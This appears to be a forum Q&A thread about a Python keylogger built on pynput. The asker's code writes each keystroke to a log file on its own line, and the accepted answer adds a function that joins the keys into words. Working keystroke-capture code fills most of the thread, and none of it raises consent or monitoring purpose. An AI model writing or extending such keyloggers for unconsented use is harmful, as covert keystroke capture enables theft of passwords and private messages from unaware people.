# Simple keylogger "Problem in logging to a file"

Tags: python, keylogger

**Problem :**

Logging file saves **one char after another in a new line for each char**.

**Objective** is to log all char in a same line

is there is a problem with **format** in logging or ?

**Code**

```py
from pynput.keyboard import Key, Listener
import logging

#log file path
log_path=""

logging.basicConfig(filename=(log_path+"log_file.txt"), level=logging.DEBUG, format=' %(message)s' ) 

def btn_press(key):
    logging.info(key)


with Listener(on_press=btn_press) as listene:
    listene.join()
```

**Result:**
logging

-->In **File.txt**

l

o

g

g

i

n

g

**Expected Result**

logging

-->In **File.txt**

logging

[Like this output is needed](https://blog.rapid7.com/content/images/post-images/2112/Screen%20Shot%202012-02-21%20at%2010.00.07%20AM.png)

what kind of format this requires?

Comment: Do you expect to log one word per line or just write the typed keys as one veeeeeery long string ?

Comment: log as a word/sentence

Answer (score 3, accepted):

This function is to capture a **word/sentence**

```py
old=""
space = False
def key_log(key):
    global old
    global space

    if key=="Key.space":
        space=True

    if len(key) == 1:
        if space:
            key = old + " " + key
            space=False

        else:
            key = old + "" + key

        old = key
        print(key)
    else:
         print(key)
    logging.info(key)
```

using this function

```py
def btn_press(key):
    #logging.info(key) 
     key_log(str(key))
```

**Result**
logging

-->**File.txt**

```
l

lo

log

logg

loggi

loggin

logging
```

This way is better or any other way for it?

small help would be appreciated!.